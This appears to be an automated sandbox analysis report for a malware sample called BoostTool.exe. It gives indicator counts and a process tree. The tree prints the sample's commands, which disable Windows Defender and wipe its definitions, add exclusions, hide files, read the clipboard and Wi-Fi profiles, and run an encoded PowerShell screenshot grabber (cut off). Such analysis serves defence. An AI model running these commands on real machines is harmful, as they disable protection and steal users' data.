\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ RuntimeBroker.exe -
Runs ping.exe 1 TTPs 4 IoCs
pid Process 2524 PING.EXE 6084 PING.EXE 3476 PING.EXE 5944 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1076 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4816 WMIC.exe 4816 WMIC.exe 4816 WMIC.exe 4816 WMIC.exe 4380 powershell.exe 4380 powershell.exe 4332 powershell.exe 4332 powershell.exe 3424 powershell.exe 3424 powershell.exe 5144 powershell.exe 5144 powershell.exe 3476 powershell.exe 3476 powershell.exe 3476 powershell.exe 4380 powershell.exe 5144 powershell.exe 3424 powershell.exe 4332 powershell.exe 6020 powershell.exe 6020 powershell.exe 6020 powershell.exe 5880 powershell.exe 5880 powershell.exe 5880 powershell.exe 1784 WMIC.exe 1784 WMIC.exe 1784 WMIC.exe 1784 WMIC.exe 1408 WMIC.exe 1408 WMIC.exe 1408 WMIC.exe 1408 WMIC.exe 1520 WMIC.exe 1520 WMIC.exe 1520 WMIC.exe 1520 WMIC.exe 6004 powershell.exe 6004 powershell.exe 6004 powershell.exe 2512 WMIC.exe 2512 WMIC.exe 2512 WMIC.exe 2512 WMIC.exe 3108 powershell.exe 3108 powershell.exe 3108 powershell.exe 3264 powershell.exe 3264 powershell.exe 5740 powershell.exe 5740 powershell.exe 5912 powershell.exe 5912 powershell.exe 3264 powershell.exe 3264 powershell.exe 5740 powershell.exe 5912 powershell.exe 5912 powershell.exe 5740 powershell.exe 1116 WMIC.exe 1116 WMIC.exe 1116 WMIC.exe 1116 WMIC.exe 700 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 4816 WMIC.exe Token: SeSecurityPrivilege 4816 WMIC.exe Token: SeTakeOwnershipPrivilege 4816 WMIC.exe Token: SeLoadDriverPrivilege 4816 WMIC.exe Token: SeSystemProfilePrivilege 4816 WMIC.exe Token: SeSystemtimePrivilege 4816 WMIC.exe Token: SeProfSingleProcessPrivilege 4816 WMIC.exe Token: SeIncBasePriorityPrivilege 4816 WMIC.exe Token: SeCreatePagefilePrivilege 4816 WMIC.exe Token: SeBackupPrivilege 4816 WMIC.exe Token: SeRestorePrivilege 4816 WMIC.exe Token: SeShutdownPrivilege 4816 WMIC.exe Token: SeDebugPrivilege 4816 WMIC.exe Token: SeSystemEnvironmentPrivilege 4816 WMIC.exe Token: SeRemoteShutdownPrivilege 4816 WMIC.exe Token: SeUndockPrivilege 4816 WMIC.exe Token: SeManageVolumePrivilege 4816 WMIC.exe Token: 33 4816 WMIC.exe Token: 34 4816 WMIC.exe Token: 35 4816 WMIC.exe Token: 36 4816 WMIC.exe Token: SeDebugPrivilege 4100 tasklist.exe Token: SeDebugPrivilege 4696 tasklist.exe Token: SeDebugPrivilege 4380 powershell.exe Token: SeDebugPrivilege 3912 tasklist.exe Token: SeDebugPrivilege 4332 powershell.exe Token: SeDebugPrivilege 3424 powershell.exe Token: SeDebugPrivilege 5144 powershell.exe Token: SeIncreaseQuotaPrivilege 4816 WMIC.exe Token: SeSecurityPrivilege 4816 WMIC.exe Token: SeTakeOwnershipPrivilege 4816 WMIC.exe Token: SeLoadDriverPrivilege 4816 WMIC.exe Token: SeSystemProfilePrivilege 4816 WMIC.exe Token: SeSystemtimePrivilege 4816 WMIC.exe Token: SeProfSingleProcessPrivilege 4816 WMIC.exe Token: SeIncBasePriorityPrivilege 4816 WMIC.exe Token: SeCreatePagefilePrivilege 4816 WMIC.exe Token: SeBackupPrivilege 4816 WMIC.exe Token: SeRestorePrivilege 4816 WMIC.exe Token: SeShutdownPrivilege 4816 WMIC.exe Token: SeDebugPrivilege 4816 WMIC.exe Token: SeSystemEnvironmentPrivilege 4816 WMIC.exe Token: SeRemoteShutdownPrivilege 4816 WMIC.exe Token: SeUndockPrivilege 4816 WMIC.exe Token: SeManageVolumePrivilege 4816 WMIC.exe Token: 33 4816 WMIC.exe Token: 34 4816 WMIC.exe Token: 35 4816 WMIC.exe Token: 36 4816 WMIC.exe Token: SeDebugPrivilege 3476 powershell.exe Token: SeDebugPrivilege 6020 powershell.exe Token: SeIncreaseQuotaPrivilege 3476 powershell.exe Token: SeSecurityPrivilege 3476 powershell.exe Token: SeTakeOwnershipPrivilege 3476 powershell.exe Token: SeLoadDriverPrivilege 3476 powershell.exe Token: SeSystemProfilePrivilege 3476 powershell.exe Token: SeSystemtimePrivilege 3476 powershell.exe Token: SeProfSingleProcessPrivilege 3476 powershell.exe Token: SeIncBasePriorityPrivilege 3476 powershell.exe Token: SeCreatePagefilePrivilege 3476 powershell.exe Token: SeBackupPrivilege 3476 powershell.exe Token: SeRestorePrivilege 3476 powershell.exe Token: SeShutdownPrivilege 3476 powershell.exe Token: SeDebugPrivilege 3476 powershell.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 1076 EXCEL.EXE 1076 EXCEL.EXE 1076 EXCEL.EXE 1076 EXCEL.EXE 1076 EXCEL.EXE 1076 EXCEL.EXE 1076 EXCEL.EXE 1076 EXCEL.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2816 wrote to memory of 1996 2816 BoostTool.exe 82 PID 2816 wrote to memory of 1996 2816 BoostTool.exe 82 PID 2816 wrote to memory of 656 2816 BoostTool.exe 84 PID 2816 wrote to memory of 656 2816 BoostTool.exe 84 PID 2816 wrote to memory of 656 2816 BoostTool.exe 84 PID 1996 wrote to memory of 476 1996 BoostTool.exe 87 PID 1996 wrote to memory of 476 1996 BoostTool.exe 87 PID 1996 wrote to memory of 4172 1996 BoostTool.exe 89 PID 1996 wrote to memory of 4172 1996 BoostTool.exe 89 PID 1996 wrote to memory of 4172 1996 BoostTool.exe 89 PID 656 wrote to memory of 3356 656 RuntimeBroker.exe 90 PID 656 wrote to memory of 3356 656 RuntimeBroker.exe 90 PID 656 wrote to memory of 1916 656 RuntimeBroker.exe 91 PID 656 wrote to memory of 1916 656 RuntimeBroker.exe 91 PID 656 wrote to memory of 1916 656 RuntimeBroker.exe 91 PID 4172 wrote to memory of 4784 4172 RuntimeBroker.exe 92 PID 4172 wrote to memory of 4784 4172 RuntimeBroker.exe 92 PID 476 wrote to memory of 988 476 BoostTool.exe 95 PID 476 wrote to memory of 988 476 BoostTool.exe 95 PID 476 wrote to memory of 3716 476 BoostTool.exe 96 PID 476 wrote to memory of 3716 476 BoostTool.exe 96 PID 476 wrote to memory of 3716 476 BoostTool.exe 96 PID 3356 wrote to memory of 1092 3356 ._cache_RuntimeBroker.exe 97 PID 3356 wrote to memory of 1092 3356 ._cache_RuntimeBroker.exe 97 PID 3356 wrote to memory of 1092 3356 ._cache_RuntimeBroker.exe 97 PID 3716 wrote to memory of 3260 3716 RuntimeBroker.exe 98 PID 3716 wrote to memory of 3260 3716 RuntimeBroker.exe 98 PID 4784 wrote to memory of 2064 4784 ._cache_RuntimeBroker.exe 99 PID 4784 wrote to memory of 2064 4784 ._cache_RuntimeBroker.exe 99 PID 4784 wrote to memory of 2064 4784 ._cache_RuntimeBroker.exe 99 PID 988 wrote to memory of 2468 988 BoostTool.exe 100 PID 988 wrote to memory of 2468 988 BoostTool.exe 100 PID 988 wrote to memory of 2824 988 BoostTool.exe 101 PID 988 wrote to memory of 2824 988 BoostTool.exe 101 PID 988 wrote to memory of 2824 988 BoostTool.exe 101 PID 1092 wrote to memory of 1368 1092 RuntimeBroker.exe 213 PID 1092 wrote to memory of 1368 1092 RuntimeBroker.exe 213 PID 2824 wrote to memory of 1804 2824 RuntimeBroker.exe 107 PID 2824 wrote to memory of 1804 2824 RuntimeBroker.exe 107 PID 2064 wrote to memory of 400 2064 RuntimeBroker.exe 108 PID 2064 wrote to memory of 400 2064 RuntimeBroker.exe 108 PID 3260 wrote to memory of 852 3260 ._cache_RuntimeBroker.exe 109 PID 3260 wrote to memory of 852 3260 ._cache_RuntimeBroker.exe 109 PID 3260 wrote to memory of 852 3260 ._cache_RuntimeBroker.exe 109 PID 2468 wrote to memory of 3304 2468 BoostTool.exe 110 PID 2468 wrote to memory of 3304 2468 BoostTool.exe 110 PID 2468 wrote to memory of 4552 2468 BoostTool.exe 174 PID 2468 wrote to memory of 4552 2468 BoostTool.exe 174 PID 2468 wrote to memory of 4552 2468 BoostTool.exe 174 PID 852 wrote to memory of 3012 852 RuntimeBroker.exe 112 PID 852 wrote to memory of 3012 852 RuntimeBroker.exe 112 PID 1368 wrote to memory of 1520 1368 ._cache_RuntimeBroker.exe 231 PID 1368 wrote to memory of 1520 1368 ._cache_RuntimeBroker.exe 231 PID 1368 wrote to memory of 1520 1368 ._cache_RuntimeBroker.exe 231 PID 4552 wrote to memory of 4940 4552 RuntimeBroker.exe 114 PID 4552 wrote to memory of 4940 4552 RuntimeBroker.exe 114 PID 1520 wrote to memory of 3624 1520 RuntimeBroker.exe 158 PID 1520 wrote to memory of 3624 1520 RuntimeBroker.exe 158 PID 3304 wrote to memory of 548 3304 BoostTool.exe 117 PID 3304 wrote to memory of 548 3304 BoostTool.exe 117 PID 3012 wrote to memory of 2736 3012 ._cache_RuntimeBroker.exe 118 PID 3012 wrote to memory of 2736 3012 ._cache_RuntimeBroker.exe 118 PID 3012 wrote to memory of 2736 3012 ._cache_RuntimeBroker.exe 118 PID 3304 wrote to memory of 1352 3304 BoostTool.exe 177 -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 4552 attrib.exe 5892 attrib.exe 4744 attrib.exe 5668 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:476 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"7⤵
- Checks computer location settings
PID:548 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"8⤵
- Checks computer location settings
PID:1756 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"9⤵
- Checks computer location settings
PID:4604 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"10⤵
- Checks computer location settings
PID:4780 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"11⤵
- Checks computer location settings
PID:1352 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"12⤵
- Checks computer location settings
PID:5412 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"13⤵
- Checks computer location settings
PID:2052 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"14⤵
- Checks computer location settings
PID:5828 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"15⤵
- Checks computer location settings
PID:4340 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"16⤵
- Checks computer location settings
PID:4724 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"17⤵
- Checks computer location settings
PID:5592 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"18⤵
- Checks computer location settings
PID:3720 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"19⤵
- Checks computer location settings
PID:5252 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"20⤵
- Checks computer location settings
PID:5248 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"21⤵
- Checks computer location settings
PID:3024 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"22⤵
- Checks computer location settings
PID:3248 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"23⤵
- Checks computer location settings
PID:5888 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"24⤵
- Checks computer location settings
PID:6084 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"25⤵
- Checks computer location settings
PID:4260 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"26⤵
- Checks computer location settings
PID:656 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"27⤵
- Checks computer location settings
PID:2540 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"28⤵
- Checks computer location settings
PID:3672 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"29⤵
- Checks computer location settings
PID:3396 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"30⤵
- Checks computer location settings
PID:692 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"31⤵
- Checks computer location settings
PID:400 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"32⤵
- Checks computer location settings
PID:1152 -
C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"33⤵PID:5464
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"33⤵PID:3700
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"34⤵PID:5216
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"32⤵PID:5816
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"33⤵PID:700
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'"34⤵PID:6036
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV135⤵PID:5784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'35⤵
- Command and Scripting Interpreter: PowerShell
PID:4640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"34⤵PID:1016
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend35⤵
- Command and Scripting Interpreter: PowerShell
PID:2684
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All35⤵
- Deletes Windows Defender Definitions
PID:5888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe""34⤵
- Hide Artifacts: Hidden Files and Directories
PID:4156 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV135⤵PID:5856
-
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"35⤵
- Views/modifies file attributes
PID:5668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"34⤵PID:4744
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'35⤵
- Command and Scripting Interpreter: PowerShell
PID:5852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"34⤵PID:1168
-
C:\Windows\system32\tasklist.exetasklist /FO LIST35⤵
- Enumerates processes with tasklist
PID:5420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"34⤵PID:5672
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV135⤵PID:3024
-
-
C:\Windows\system32\tasklist.exetasklist /FO LIST35⤵
- Enumerates processes with tasklist
PID:1728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"34⤵PID:5728
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName35⤵PID:6040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"34⤵
- Clipboard Data
PID:6120 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV135⤵PID:3160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard35⤵
- Clipboard Data
PID:5024
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"34⤵PID:3632
-
C:\Windows\system32\tasklist.exetasklist /FO LIST35⤵
- Enumerates processes with tasklist
PID:5884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"34⤵PID:4072
-
C:\Windows\system32\tree.comtree /A /F35⤵PID:1064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"34⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1520 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV135⤵PID:2540
-
-
C:\Windows\system32\netsh.exenetsh wlan show profile35⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"34⤵PID:5260
-
C:\Windows\system32\systeminfo.exesysteminfo35⤵
- Gathers system information
PID:1596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="34⤵PID:4292
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAH